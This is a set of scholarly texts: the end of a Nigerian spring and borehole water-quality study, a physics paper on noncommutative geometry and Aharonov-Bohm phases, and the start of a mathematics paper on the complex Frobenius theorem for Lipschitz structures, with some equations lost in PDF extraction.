Samples were collected at Ekoli, Nguzu, Ebunwana, Owutu, Etiti, Amangwu and Oso, Autonomous Communities in Edda Local Government Area.These seven autonomous communities covered the two major geological divisions of Edda Local Government Area with Ekoli, Nguzu and Ebunwana representing the upper division of Edda Local Government Area, while Owutu, Etiti, Amangwu and Oso represent the lower part of Edda Local Government Area.A total of 21 sample stations (Figure 1) were mapped out in the locality and coded as Anyoji(ASp), Eme-Udu (BSp), Nne-Oji (CSp), Achi-Ogba (DSp), Iminika spring (ESp), Mgbogho Libolo ( FS), Olo Ekoli (GS), Ofoiyi Owutu (HS), Oghuekpe Amangwu (IS), Iyere Ogwuma (JS) while the borehole samples included, Amaukabi (KB), Nde Okpo (LB), Okporojo Sec School (MB) and Julius Awa (NB).The control water sample was drawn from a borehole at Ninth Mile corner in Enugu State and was .codedOB and serves as the Control.Electronic Hand-held GPS instrument was used to record the co-ordinates of each sampling point (Table 2).
Source: Cartograhic Unit, Department of Geology, Ebonyi State University
Sampling and Laboratory Analyses
The plastic containers used for sample collection were thoroughly washed with detergent, rinsed with distilled water to remove any trace of contaminant which may remain in the containers and dried.It was further rinsed with 0.1M HNO3 and preserved with the acid prior to sampling.Composite samples were collected in one litre polyethylene containers.The containers were labeled according to sample source using masking tape and a permanent marker for easy identification.At the point of sampling, the sample bottles were emptied and rinsed three times with the very sample water.The hand held borehole was pumped for 3 mins to homogenize the mix before filling the container to the brim and capped.In order to prevent some metal loss through surface adsorption and to immobilize the metals in solution 4 cm 3 of concentrated HNO3 was added into the 1-litre of the water sample to preserve the metals prior to laboratory analysis.The same procedure was followed for the spring and stream water samples.For quality assurance, batch samples were collected twice in a day (morning, 7.30 -10.00 am and evening 5.00 -7.30 pm) and mixed to obtain the composite sample used in the study.Triplicate determinations of each parameter were carried out in each sample.Physicochemical parameters such as Temperature, Turbidity, pH were taken in-situ with the aid of Multiparameter Datalogger (Hanna Model No.11 1991300), EC and TDS were determined using conductivity/TDS/Sal/Res.Meter, Model SX 713.The heavy metals were carried out using atomic absorption spectrophotometer (AAS), the Na and K were tested with flame photometer.The acid radicals and total hardness were analyzed titrimetrically.
Results
The results of the evaluation of surface and groundwater quality are presented in Table 2.The summary of the statistical description of the groundwater quality are presented in Table 3. Data are presented as means, standard deviation, standard error, coefficient of variation (CV) and percentage relative standard deviation (% RSD).
Discussion
The pH in Table 3 ranged from 4.60 to 6.7 with a mean value of 5.76, indicating a moderately acidity to near neutral nature of water sources.Except location MB with a pH of 6.7±0.094,all other locations have pH lower than the WHO (6.5-8.5)standard for drinking water quality.This compares well with the mean values of 5.70 and 6.12 findings of [17], respectively.The low pH has the capacity to attack geological materials and leach toxic metals into the water.Metals tend to be more toxic at lower pH because they are more soluble [14].The mean and range of Electrical Conductivity (EC) as shown in Table 3 were 480.20 and 53.1 -2450s/cm, respectively.Apart from Location MB that recorded the highest EC of 2450s/cm other locations were below [15], [16] permissible limit of 1000 s/cm for drinking water.EC is related to the concentrations of total dissolved solids and major ions.The results of the findings agree with [19] in the literature.This high value is an indication that the water is not fresh and potable.The mean Turbidity values as shown in Table 3 ranged from 0.5±0.047-2±0.094NTU.Turbidity values in all the water samples were generally low when compared with [1] drinking water standard of 5 NTU.The appearance of water with turbidity less than 5 NTU is usually acceptable to consumers [19].Turbidity in water samples is a function of total suspended solids (TSS) as well as Total dissolved solids (TDS).Excessive turbidity, or cloudiness, in drinking water is aesthetically unappealing, and may also represent a health concern.The results of the analysis in Table 3 showed that Total Dissolved Solids (TDS) values ranged from 23.1±0.047-1830±16.997mg/lwith mean concentrations of 342.71 mg/l.Apart from Location MB with TDS mean concentration of 1830±16.997mg/lwhich was above the WHO (500mg/l) permissible limit of drinking water, all other locations were within the WHO limits.It is reported in that water with a TDS above 500 mg/l is not recommended for use as drinking water and other sophisticated applications as a result of excessive scaling in water pipes and heating wares.The results in Table 3 showed that the spring water recorded Alkalinity that were below WHO [19] permissible limit of 100mg/l for drinking water while the stream and the borehole waters recorded values greater than the WHO permissible limit.The high alkalinity in stream and boreholes may be due to the dissolution of crystalline limestone which is abundant in the study area.The alkalinity of water is caused mainly due to OH -, CO3 2-and HCO3 -ions.
[16] also reported similar results in groundwater analysis in Ikere which was above the maximum allowable contamination value of 100 mg/l.The concentration of Total Hardness in Table 3 range from 4 -170 mg/l with a mean value of 76.33 mg/l and all the locations recorded values below the [30] drinking water standard of 500mg/l.Water total hardness is imparted mainly by the calcium and magnesium ions, which apart from sulphate, chloride and nitrates are found in combination with carbonates [20].Table 3 shows that the Dissolved Oxygen (DO) ranged 5.07±0.012-7.72±0.016mg/l with a mean value of 6.19 mg/l.This value is high when compared with literature [20].Out of the 15 locations, 47% of the samples analyzed contain dissolved oxygen less than 6 mg/l while 53% of the samples contained more than 6mg/l, which represents that groundwater was not contaminated by organic matter and non-polluted with respect to biological parameters [16].Low DO may result an anaerobic conditions that result obnoxious odour.Depletion of dissolved oxygen in water supplies can encourage the microbial reduction of nitrate to nitrite and sulphate to sulphide [19].The value of Biochemical Oxygen Demand (BOD) was in the range 0.4±0.047mg/l to 12.80±0.082mg/lwith a mean concentration of 4.8mg/l.These values are consistent with the findings of [17].A low level of this BOD is an indication of little pollution which implies low aerobic activity.The results in Table 2 show that all the NO3 - concentrations recorded in all the locations ranged 1.14 ± 0.009 -1.73 ± 0.024 mg/l respectively with a mean concentration of 1.87 mg/l they were below the [35] drinking water standard of 10mg/l of nitrate.This low level is an indication that there is low infiltration of nitrate into the water bodies from the dumpsites.It is reported that NO3 -level above the WHO limit is dangerous to children below the age of 6 and pregnant women as it has the potential of causing metheglobenamia [21].Excessive nitrate exposure can result in acute acquired methemoglobinemia, a serious health condition [21].The results of the analysis in Table 3 showed that the Phosphate concentration ranged from 0.09±0.00 to 15.76±0.028mg/l with a mean concentration of 1.85mg/l.With exception of location AB with a mean concentration of 15.76±0.028,exceeding the WHO stipulated tolerance level of 5.0mg/l for potable water, other locations were within the WHO threshold of drinking water standard.It is stipulated in literature that traces of PO4 -3 at 0.1mg/l in water has deleterious effect on water quality by promoting the development of slimes and algal growth.It is reported that the presence of phosphate in the groundwater body emanates from sources such as sewage, detergents, industrial effluents and agricultural drainage [7].
Water Quality Index
The results of the calculation of water quality index (WQI) of the spring, stream and borehole waters are shown in Table 4.The WQI of the water sample was 57.92 was below the critical water quality index value of 100.Any water with a record of WQI of 57.92 according to the grading of water quality [4] is very poor water quality and the finding was not in accord with the submission of [22] which was 83.05.This very grade of WQI in the samples could be linked to the higher values of dissolved solids, turbidity and the ions in the samples.It is reported in [14] that any water with a WQI greater than 100 was unsuitable for drinking and to other domestic uses.Such water needs treatment for its quality to be enhanced.Generally, the results of the analysis showed that the spring water has a low water quality index than that of the stream and borehole water thereby making the spring water being better quality water than the borehole water as there were low pollution indicators that impacted on the spring.
Conclusion
The physicochemical assay of the spring water samples in all the locations showed that phosphate concentration were below the WHO drinking water standards except Ofoiyi Owutu (HS) that recorded 15.76±0.028which was above WHO drinking water standard.The boreholes and streams showed the same trend with the exception of Okporojo Secondary School (MB) that recorded higher values for EC (2450.00 ± 4.32 mg/L), TDS (1830.00 ± 17.00 mg/L), total alkalinity (2080.00± 4.71 mg/L) total dissolved solids (1830.00± 2.36 mg/L), total alkalinity (2080.00± 4.71 mg/L
Recommendations
Consumers of spring water especially the people of Ekoli Edda where only spring water exist should be properly and regularly educated on simple domestic or household treatment of the water using the CaOCI2; Studies on the soil chemistry of the spring water source should be carried out to identify the specific cause of the acidity; in general, the spring water in the study area should be treated to enhance the pH and hardness to make it safe for drinking.
Figure 1
Figure 1 Map of Edda LGA showing sample locations
Table 1
Classification of Water Quality based on Weighted Arithmetic WQI Method [6]rce:[6] study area was Edda Local Government Area, located in the Southern Zone of Ebonyi State, Nigeria.Geographically, Edda Local Government Area situate between 70.45 and 50.58 latitudes north of the equator and lies about 90 miles (144.873km) north of the Atlantic coast.Her surface land area is about 86.14 square miles (223.1 square kilometres) [17].Edda has boundaries on the North with Ohaozara; on the South by Ohafia Local Government Area; on the East by Unwana/Afikpo and by the West with Akaeze/Nkporo.The local government area occupies about 378 square kilometers with population of about 240,000 according to the 2006 national demography (Ebonyi State).
Table 2
Locations, Codes and GPS Co-ordinates of the sample sites
Table 3
Mean ±SE of Physicochemical Parameters of Water Samples
Table 4
Results of the Water Quality Index (WQI) of the water samples | 2024-02-26T16:05:50.603Z | 2024-02-28T00:00:00.000 | {
"year": 2024,
"sha1": "266929b175d531ac2a2a0ca8de89890c4c29e621",
"oa_license": "CCBYNCSA",
"oa_url": "https://wjarr.com/sites/default/files/WJARR-2024-0547.pdf",
"oa_status": "HYBRID",
"pdf_src": "Anansi",
"pdf_hash": "a169f184a3de03b93bf2ae45dd31dc58aaaa17a8",
"s2fieldsofstudy": [
"Environmental Science"
],
"extfieldsofstudy": []
} |
119524585 | pes2o/s2orc | v3-fos-license | Noncommutative Geometry and Geometric Phases
We have studied particle motion in generalized forms of noncommutative phase space, that simulate monopole and other forms of Berry curvature, that can be identified as effective internal magnetic fields, in coordinate and momentum space. The Ahranov-Bohm effect has been considered in this form of phase space, with operatorial structures of noncommutativity. Physical significance of our results are also discussed.
I. INTRODUCTION
The possible existence of magnetic monopole (MM) was first discussed by Dirac [1]and later in [2]in non-abelian gauge theory.
However, recently [3] the signatures of MM in crystal momentum space in SrRuO 3 , (a ferromagnetic crystal), have appeared as peaks in transverse conductivity σ xy . The MM formation in low energy regime (∼ 0.1 − 1eV) in the condensed matter system [3], (as compared to the predicted range ∼ 10 16 GeV in particle physics [2]), is obviously the reason for their observation in the former. The MM in σ xy is again directly linked to Anomalous Hall Effect (AHE) where σ xy is identified as the Berry curvature. The very intrinsic origin of AHE [4], independent of external magnetic fields, suggests [5] that the whole phenomena might be interpreted as a motion of (Bloch) electrons in a non-trivial symplectic manifold with the symplectic two-form being essentially the Berry curvature. This is a specific form of Non-Commutative (NC) space (see for example [6]), that appears because one introduces [3,7] a gauge covariant position operator x µ ≡ i∂ µ − a nµ ( k), a nµ = i < u n k | ∂ ∂kµ u n k >, for the Bloch wavefunction ψ n k (r) = exp(i k. r)u n k (r), with the coordinates satisfying the NC structure, [x µ , x ν ] = −iF µν , F µν = ∂ kµ a nν − ∂ kν a nµ . This NC induces the additional anomalous part of velocity that yields the AHE. Notice that for the crystalline system in question, Bloch states are the natural setting and the curvatures become functions of momenta as expected. Clearly a nµ is unrelated to any external source and is generated within.
In a recent paper [8] real space Berry phase manifests as a further contribution in AHE in AuFe alloy and the underlying theory [9] requires a topologically non-trivial spin configuration. The theory [9] indicates that the coupling between this net spin chirality and a global magnetization, (which might be spontaneous, as in AuFe alloy), plays a crucial role. Onoda, Tatara and Nagaosa in [9] have argued that the real space and momentum space Berry phase manifest itself in two different regimes. The real space vortex is a good picture in disordered case (equivalently for short electrons with mean free path) whereas momentum space vortex is a useful model in the pure case [10]. A re-entrant ferromagnet, such as the AuFe alloy is a sample of the former kind. It should also be remembered that [10] in principle, complicated structures of Berry curvature are indeed possible depending on the particular nature of a sample, although so far the only numerical work concerns the simple monopole form, as observed in [3]. Besides, a study of the underlying geometry of the ferromagnetic spin system shows that the inherent magnetic type of behavior is caused by the Berry curvature in real space which arises due to the spin rotations of conducting electrons and is the effect of noncommutativity in momentum space [? ].
Keeping this background in mind, we put forward forms of NC space that can induce singular behavior (in the effective magnetic field) in coordinate space. Different novel structures of Berry curvature appear in our framework. Incidentally, our work is a generalization of the work of [5]. The NC structure and its associated symplectic form, considered in [5], was not general enough to allow the vortex structures that we have obtained here.
With this special form of NC space we have calculated the Aharanov-Bohm (AB) phase and have shown that there is a modification term due to the noncommutativity of space-space coordinates. This leads to new expression and bound for θ -the noncommutativity parameter.
The paper is organized as follows: In Section II we introduce the particular form of NC space that will be studied subsequently. Section III deals with the Lagrangian formulation of the model and the related dynamics in a general way. Section IV is devoted to the study of the Aharanov-Bohm effect in this specific NC phase space . In Section V we discuss the physical implications of our findings.
II. NONCOMMUTATIVE PHASE SPACE
We start by positing a non-canonical phase space that has the Snyder form of spatial noncommutativity and at the same time the momenta satisfies a conventional monopole algebra. Similar structures have also appeared in [11]. In the beginning we have introduced two distinct NC parameters θ and b for the above two independent forms of noncommutativity so that their individual roles can be observed.
The phase space is given below: where X = √ X 2 . We discuss rotational properties of the vectors. From the definition of the angular momentum, L j = ǫ jkl X k P l we have the following commutation relations, Notice that b (and not θ) destroys the transformation properties. But this is expected since as is well known the Snyder algebra does not clash with rotational invariance. To restore the angular momentum algebra consider the term which yields the total angular momentum asL We naturally identify S as the effective spin vector, that is induced by the algebra (1). Now angular momentum algebra is given by Putting d = b the algebra is as follows The above considerations prompt us to study a simpler NC algebra, with b = θ, Hence the NC algebra is governed by a single NC parameter θ.
Hence to the approximation (i.e. O(θ)) that we are interested in and ignoring the terms which are in order of θ 2 , we find, Thus, to the lowest non-trivial order in θ, is possible to define an angular momentum operator in a consistent way.
Since the form of noncommutativity is operatorial in nature we must check that the Jacobi identities are satisfied, The Jacobi identity between transformed angular momentum is also satisfied, However the Jacobi identity between momenta is violated, But from the analysis of Jackiw [1] we know the implications of this violation and how to live with it.
III. SYMPLECTIC DYNAMICS
Non-violation of the Jacobi identities (at least up to the prescribed order) is essential in our case since we wish to study the dynamics by exploiting the elegant scheme of Faddeev and Jackiw [12] and follow the notation of a recent related work [13].
A generic first order Lagrangian, expressed in the form, where η denotes phase space variables, leads to the Euler-Lagrange equations of motion, where ω αβ denotes the symplectic two form. The inverse of the symplectic matrix is given by ω αβ .
For our model, following (7), ω αβ is defined by, The particle dynamics is easily derived in a straightforward way exploiting (15). We have, Considering a simple form of H, In the above we have identified −(∂V )/(∂X i ) ≡ E i , the external electric field. We can rewrite the equations of motion as,˙ where m * = m(1 − θP 2 ) −1 and the spin vector S has been defined in (3). It is interesting to note that the origins of Berry curvature terms in (19) and (20) are different: the Snyder form of spatial noncommutativity in (1) is responsible for the former, whereas monopole form of the momentum noncommutativity in (1) for the latter. We can also express (19) aṡ It is straightforward to iterate (17) once again so that we obtain a generalized Lorentz force equation in the following form, We will study the significance of these equations in the Discussion, Section V, at the end.
IV. THE AHARONOV-BOHM EFFECT ON NC (SNYDER) SPACE
In non-commutative space many interesting quantum mechanical problems have been studied extensively: such as hydrogen atom spectrum in an external magnetic field [14,15], Aharonov-Bohm (AB) [16,17], Aharonov-Casher effects [18], to name a few. However, all the above works have considered a constant form spatial noncommutativity. In the present work, for the first time, we consider such effects in the presence of an operatorial form of noncommutativity. Here we consider a purely Snyder form of noncommutative space, that we obtained from (1) by putting {P i , P j } = 0.
In the commutative Aharonov-Bohm effect, the presence of the flux produces a shift in the interference pattern. The value of the flux is such that the position of maxima and minima are interchanged due to a change of π in the phase and vanishes when magnetic field is quantized. For noncommutative Aharonov-Bohm effect a velocity dependent extra term in the flux arises even in the presence of quantized magnetic field [16]. This could be experimentally measured. The velocity can be so chosen that the phase shift become 2π or integer multiple of 2π. So this phase shift might not be observed. The Aharonov-Bohm effect in noncommutative case can also be worked out using path integral formulation [16]. Electrons moving on a noncommutative plane in uniform external magnetic and electric field represents usual motion of electrons in an effective magnetic field. The related AB phase can be calculated and it yields the same effective magnetic field [17]. Using non-commutative quantum mechanics Aharonov-Bohm phase can be obtained on NC phase space [17].
For the NC phase space (23), the variables X i , P j can be expressed in terms of canonical (Darboux) set of variables x i , p j : The x i , p j satisfy Let H(X, P ) be the Hamiltonian operator of the usual quantum system, then the Schrödinger equation on NC space is written as The star product can be changed into the ordinary product by replacing H(X, P ) with H(x, p) [19]. Thus the Schrödinger equation can be written as, When magnetic field is applied, the Schrödinger equation becomes Now we also need to replace the vector potential A i with a phase shift as given by So, the Schrödinger equation (27) in the presence of magnetic field becomes If ψ 0 is the solution of (29) when A i = 0, then the general solution of (29) may be given by The phase term of (30) is called the AB phase. In a double slit experiment if we consider the charged particle of charge q and mass m to pass through one of the the slits, then the integral in (30) runs from the source x 0 to the screen x, the interference pattern will depend on the phase difference of two paths. The total phase shift for the AB effect is where we use the equation mv l = p l − qA l . The line integral runs from the source through one slit to the screen and returns to the source through another slit. The first term of (31) is the usual AB phase. One of the four θ dependent term in (31) is The rest are computed in a similar way. Adding all the terms we can write the AB phase as Previous results [16,17] with a constant form of spatial noncommutativity are of the form, Comparing our result with the above (33), we find that the NC correction in our case altogether a different structure and also there appears an extra piece (m v + q A). x, which is a consequence of the form of space-space noncommutativity chosen in our model. We discuss the implications of our result in the Discussion section.
V. DISCUSSIONS:
Let us summarize and motivate our results. Our aim has been to demonstrate effective models of interest, (specially in the context of Condensed Matter physics), can be simulated compactly in a purely Hamiltonian formulation, developed in a suitable noncommutative space. The advantage is that one can have a simple form of Hamiltonian and the complicated responses of the system are induced by the noncommutative structure of spacetime. To be specific, in the present work in Section III, we have shown that effective spin-contributions are generated in our model, only from the symplectic structure with no explicit spin-term as such.
It was shown in [5] that the anomalous velocity term related to spin Hall effect has a natural interpretation in terms of a noncommutative space. We have shown that this result can be generalized in various possible ways: One can have Berry curvature terms both in coordinate as well as in momentum space and the singularity structure of the Berry potential, (not shown here) , can be more complicated than that of a monopole. This will become apparent if one inverts ω αβ in (15) to recover the Berry potential.
A novel form of anomalous velocity term has been derived in (17). From the equivalent form (19) we infer that there will be a deviation in the particle trajectory in the presence of an electric field [20].
On the other hand, in (20) we have an explicitly spin dependent term in the expression of˙ P with a coordinate space singularity. Once again, in the alternative force equation in (22), the leading term in low energy θ P × S X 2 reminds us of models with the Rashba type of interactions [21]. Hence, these effects can be relevant for the studies in [8,9]. Now we come to the results obtained in Section IV and their implications. As we have mentioned in Section IV, we consider the Snyder noncomutative space, as given in (23). As we have pointed out in Section IV, in the present case, the θ-contribution in the AB phase, (derived for the constant noncommutative case [16,17]), gets multiplied by a dynamical factor. This leads to some interesting consequences. As in previous cases [16], we can also derive a bound on θ pertaining to experimental observations. We compute γ, the ratio of the AB phases appearing in the normal case and noncommutative case: In (34), ∆φ N C corresponds to the θ-contribution in (32) and ∆φ refers to the θ = 0 commutative case, R denotes the electron radius in the experimental setup and λ e is the Compton wavelength of the electron. Interestingly, in the present case, the extra dynamical factor cancels R in γ and reproduces the bound in the R-independent form: This is distinct from the previously obtained expressions [16] but the bound is much lowered than that of [16]. Finally, we would like to make a remark on the effect a generic noncommutative space can have in the study of inequivalent quantization in a non-simply connected manifold [22]. It is well known that AB effect is a prototype example of a multiply connected domain since the region of the solenoid that carries the magnetic flux is inaccessible to the charged particle. This leads to a punctured manifold Q = R 2 − δ, (δ denoting the solenoidal area), with a non-trivial first homotopy group Π 1 (Q) = Z. One can still work in the trivial homotopy sector, but this requires additional topological terms in the action. They clearly show up in the path-integral quantization of the system. These issues have been extensively studied in [22], for the normal (commutative) spacetime. As it has been established here and before [16,17], that noncommutative nature of spacetime generates additional contributions in the AB phase, clearly this will directly affect the above mentioned quantization programme. From the study of the modified quantization conditions, it might be possible to set an independent bound on θ. We intend to study this aspect in future. | 2019-04-14T02:54:35.123Z | 2006-04-10T00:00:00.000 | {
"year": 2006,
"sha1": "b6f23ee7942e36d1a35720fc7da1ef6179321261",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/hep-th/0604068",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "55457927d20cce705b7611416ad46c40ebebfec5",
"s2fieldsofstudy": [
"Physics",
"Mathematics"
],
"extfieldsofstudy": [
"Physics"
]
} |
14196555 | pes2o/s2orc | v3-fos-license | The Complex Frobenius Theorem for Rough Involutive Structures
We establish a version of the complex Frobenius theorem in the context of a complex subbundle S of the complexified tangent bundle of a manifold, having minimal regularity. If the subbundle S defines the structure of a Levi-flat CR-manifold, it suffices that S be Lipschitz for our results to apply. A principal tool in the analysis is a precise version of the Newlander-Nirenberg theorem with parameters, for integrable almost complex structures with minimal regularity, which builds on previous recent work of the authors.
Introduction
The complex Frobenius theorem elucidates the structure of a complex subbundle S of the complexified tangent bundle CT Ω of a smooth manifold Ω, satisfying an involutivity condition, which can be stated as follows: if X and Y are (sufficiently regular) sections of S, then Here, as usual, if X = X 0 + iX 1 and X 0 , X 1 are real vector fields, we write X = X 0 − iX 1 , and the fiber of S over p ∈ Ω is given as (1.3) S p = {u − iv : u + iv ∈ S p , u, v ∈ T p Ω}.
1 2000 Mathematics Subject Calssification. Primary 35N10 The second author was partially supported by NSF grant DMS-0139726 1 We also assume S + S is a subbundle of CT Ω.
In case S = CS 0 is the complexification of a subbundle S 0 ⊂ T Ω, the condition (1.1) just says S 0 is involutive. (Here, S = S, and (1.2) provides no additional constraint.) In this case the result reduces to the real Frobenius theorem.
An opposite extreme arises when Ω has an almost complex structure, a section J of End T Ω satisfying J 2 = −I (which implies that dim Ω is even). We set (1.4) S p = {u + iJu : u ∈ T p Ω}, so a section of S has the form X + iJX, for a general real vector field X. The condition (1.1) is that if also Y is a real vector field, then [X + iJX, Y + iJY ] = Z +iJZ for a real vector field Z. This is equivalent to the vanishing of the Nijenhuis tensor, defined by The content of the Newlander-Nirenberg theorem [NN] is that under this formal integrability hypothesis Ω has local holomorphic coordinates, i.e., functions u 1 , . . . , u k : O → C forming a coordinate system on a neighborhood O of a given p ∈ Ω, such that (X + iJX)u ℓ ≡ 0 for all real vector fields X. Thus Ω has the structure of a complex manifold. In this case, S + S = CT Ω, so (1.2) automatically holds. There are other cases, where (1.2) has a nontrivial effect, as will be seen below.
The complex Frobenius theorem was established in [Ni] for C ∞ bundles S ⊂ CT Ω satisfying (1.1)-(1.2). A major ingredient in the proof was the Newlander-Nirenberg theorem, which had been established in [NN] for almost complex structures with a fairly high degree of smoothness. Later proofs of the Newlander-Nirenberg theorem, by [NW] and by [M], work for almost complex structures J of class C 1+r with r > 0, i.e., when J has Hölder continuous first order derivatives. In [HT] the needed regularity on J was reduced to J ∈ C r with r > 1/2. (More general conditions were considered in [HT], which we will not discuss here.) The case of Lipschitz J found an immediate application in [LM].
Regarding the real Frobenius theorem, standard arguments, though frequently phrased in the context of smooth subbundles of T Ω, work for C 1 bundles. The real Frobenius theorem was extended in [Ha] to include Lipschitz subbundles.
Our main goal here is to extend Nirenberg's complex Frobenius theorem to the setting of rough bundles S ⊂ CT Ω satisfying (1.1)-(1.2). We will assume that S and S + S are Lipschitz subbundles of CT Ω. Note that if X and Y are Lipschitz sections of S, then [X, Y ] and [X, Y ] are vector fields with L ∞ coefficients. For an important class of bundles S, namely those giving rise to Levi-flat CR-structures (defined below) this regularity hypothesis will suffice. In the general case we need an additional hypothesis, given in (1.16) below. We mention that [Ho] established a version of a complex Frobenius theorem in a setting of C 1 vector fields, with C 1 commutators, but with a somewhat different thrust.
We now set up a basic strategy for obtaining such a complex Frobenius theorem, and indicate what extra analysis has to be done to treat the non-smooth case. It is convenient to begin by constructing some further subbundles of the real tangent bundle T Ω. For each p ∈ Ω, set (1.6) E p = {u ∈ T p Ω : u + iv ∈ S p , for some v ∈ T p Ω} = {w + w : w ∈ S p }, the fiber over p of a Lipschitz bundle E. Noting that if u, v ∈ T p Ω and u + iv ∈ S p , then also v − iu ∈ S p , so v ∈ E p , we see that (1.7) S + S = CE.
Next, set (1.8) V p = S p ∩ T p Ω, the fiber over p of a Lipschitz vector bundle V. Note that if u, v ∈ T p Ω, (1.9) u + iv ∈ S p ∩ S p ⇐⇒ u + iv ∈ S p and u − iv ∈ S p ⇐⇒ u ∈ S p and v ∈ S p .
The hypotheses (1.1)-(1.2) imply E and V are involutive subbundles of T Ω, i.e., (1.11) X, Y ∈ Lip(Ω, E) =⇒ [X, Y ] ∈ L ∞ (Ω, E), On the other hand, one does not recover (1.1)-(1.2) from (1.11) alone, as our second example illustrates. In that example, with S p given by (1.4), we have E = T Ω, V = 0, and (1.11) always holds, regardless of whether N in (1.5) vanishes. To capture (1.1)-(1.2), an additional structure arises. Namely, one has a complex structure on the quotient bundle E/V, defined as follows. Take u ∈ E p , so there exists v ∈ T p Ω such that u + iv ∈ S p ; in fact, v ∈ E p . We propose to set Ju = v, so the element of S p has the form u + iJu. However, the element v associated to u ∈ E p is not necessarily unique. In fact, given u, v, v ′ ∈ T p Ω and u + iv ∈ S p , we have In other words, given u ∈ E p , the residue class of Ju is well defined in E p /V p . Furthermore, if u ∈ V p , one can take v = 0, so J descends from a linear map
Since u+iv ∈ S p ⇔ v−iu ∈ S p , we also have J 2 = −I. The integrability hypotheses (1.1)-(1.2) are equivalent to (1.11), coupled to an integrability hypothesis on J, which we describe below. Let us first consider the case V = 0. Then J is a complex structure on the involutive bundle E, and (generalizing (1.4)) we have or equivalently Lipschitz sections of S have the form X + iJX, where X is a Lipschitz section of E. Then the involutivity hypothesis (1.1)-(1.2) is equivalent to the involutivity of E plus the vanishing of N , given by (1.5), for X, Y ∈ Lip(Ω, E). One says that Ω has the structure of a Levi-flat CR manifold. The real Frobenius theorem implies that Ω is foliated by leaves tangent to E. Each such leaf then inherits an almost complex structure, and the Newlander-Nirenberg theorem implies each such leaf has local holomorphic coordinates. Briefly put, Ω is foliated by complex manifolds. The complex Frobenius theorem in this context says a little more. Namely, any p ∈ Ω has a neighborhood O on which there are functions u 1 , . . . , u k , providing holomorphic coordinates on each leaf, intersected with O, and having some regularity on O. In the case of a C ∞ bundle S, [Ni] obtained such u j ∈ C ∞ (O). In the context of Lipschitz structures, we obtain certain Hölder continuity of u j , described in further detail below. A key ingredient in the analysis is a Newlander-Nirenberg theorem with parameters. In the smooth case this follows by the methods of [NN], as noted there and used in [Ni]. We devote §4 to a consideration of families of integrable almost complex structures with minimal regularity, building on techniques of [M] and of [HT]. We now turn to the case V = 0. In this case, we supplement the Lipschitz hypotheses on S and S + S with the following hypothesis. Say dim V p = ℓ ≤ k = dim E p . We assume that each p ∈ Ω has a neighborhood on which there is a local Lipschitz frame field {X 1 , . . . , X k } for E, such that {X 1 , . . . , X ℓ } is a local frame field for V and This can be regarded as an hypothesis on the regularity with which V sits in E; we discuss it further in §6. We will show that where F t X i is the flow generated by X i . Hence we can mod out by the F t 1 The rest of this paper is organized as follows. Section 2 treats the real Frobenius theorem for involutive Lipschitz bundles. We recall some results of [Ha] and establish some further results, regarding the regularity of the diffeomorphism constructed to flatten out the leaves of the foliation. In §3 we consider Levi-flat CR manifolds, in the Lipschitz category, even allowing for rougher J, and examine how such a structure pulls back under a leaf-flattening diffeomorphism from §2, to yield a parametrized family of manifolds carrying integrable almost complex structures. This sets us up for a study of the Newlander-Nirenberg theorem with parameters, which we carry out in §4.
In §5 we tie together the material of § §2-4 to obtain results on the existence and regularity of functions on open sets of a Lipschitz Levi-flat CR manifold Ω that are leafwise holomorphic (functions known as CR functions). Our primary result, Proposition 5.1, yields CR functions ϕ j , 1 ≤ j ≤ m + n − k, on a neighborhood U 1 of a point p ∈ Ω, having the property that is a homeomorphism of U 1 onto an open subset, and such that, given s < 1/2, ϕ j and Xϕ j are Hölder continuous of degree s, for any X ∈ Lip(U 1 , E). A complementary result, Proposition 5.2, shows that Φ in (1.19) can be taken to be a C 1 diffeomorphism, provided that S, and hence E and J, are regular of class C ρ for some ρ > 3/2. The results of [HT] extending the Newlander-Nirenberg theorem to cases where the almost complex structure is merely C 1/2+ε regular, and complementary results of §4, play an important role in the proof. We end §5 with a brief discussion of C 1,1 submanifolds of C N that have the structure of Levi-flat CR-manifolds. The general complex Frobenius theorem is then treated in §6.
At the end of this paper we have two appendices. Appendix A is devoted to a Frobenius theorem for real analytic, complex vector fields. There are classical results of this nature; cf. [Ni] for some references. One motivation for us to include a self contained treatment of such a result here arises from the nature of our analysis of the Newlander-Nirenberg theorem with parameters in §4. Following [M], we construct the local holomorphic coordinate chart as a composition, F = G • H. The map H is obtained via an implicit function theorem, the use of which enables us to keep track of its dependence on a parametrized family of integrable almost complex structures. The construction of H arranges things so that constructing G amounts to establishing the Newlander-Nirenberg theorem in the real analytic category, a task to which the material of Appendix A is applicable, and this material makes it clear how the factor G depends on parameters.
Finally, Appendix B gives a special treatment of the construction of CR functions on a rough Levi-flat CR manifold whose leaves have real dimension 2. The classical method of constructing isothermal coordinates is adapted to this problem and yields sharper results than one obtains in the case of higher dimensional leaves via the methods of §4. This leads to improved results in §5 in the case of 2-dimensional leaves, as is noted there.
We end this introduction with a few remarks on function spaces arising in our analysis. For a smoothly bounded domain U , C r (U) denotes the space of functions with derivatives of order ≤ r continuous on U , if r is a positive integer. If r = k + s, k ∈ Z + , 0 < s < 1, it denotes the space of functions whose kth order derivatives are Hölder continuous of order s. In addition, we make use of Zygmund spaces C r * (U ), coinciding with C r (U) for r ∈ R + \Z + , and having nice interpolation properties at r ∈ Z + . The spaces C r * (U) are also defined for r < 0. There are a number of available treatments of Zygmund spaces; we mention Chapter 13, §8 of [T] as one source. As is usual, Lip(U) denotes the space of Lipschitz continuous functions, i.e., functions Hölder continuous of exponent one, and C 1,1 (U ) denotes the space of functions whose first order derivatives belong to Lip(U ).
Real Frobenius theorem for involutive Lipschitz bundles
Let E be a sub-bundle of the tangent bundle T Ω, of fiber dimension k. We assume E is Lipschitz, in the sense that any p 0 ∈ Ω has a neighborhood O on which there are Lipschitz vector fields X 1 , . . . , X k spanning E at each point. We make the involutivity hypothesis that [X i , X j ] is a section of E at almost all points of O, or equivalently that there exist c ℓ ij ∈ L ∞ (O) such that We want to discuss the existence and qualitative properties of the foliation of Ω whose leaves are tangent to E. We may as well assume k < n = dim Ω. Suppose we have coordinates centered at p 0 such that X j (p 0 ) form the first k standard basis elements of R n , for 1 ≤ j ≤ k.
If we denote by X j (x) the image of X j (x) under the standard projection R n → R k , we have , for x in a neighborhood of p 0 (which we now denote O). We set It follows that for certain c ℓ ij ∈ L ∞ (O). Comparison of (2.4) and (2.5) yieldsc ℓ ij ≡ 0, so we have a local Lipschitz frame field for E satisfying The key result on the existence of a foliation tangent to E is the following result of [Ha].
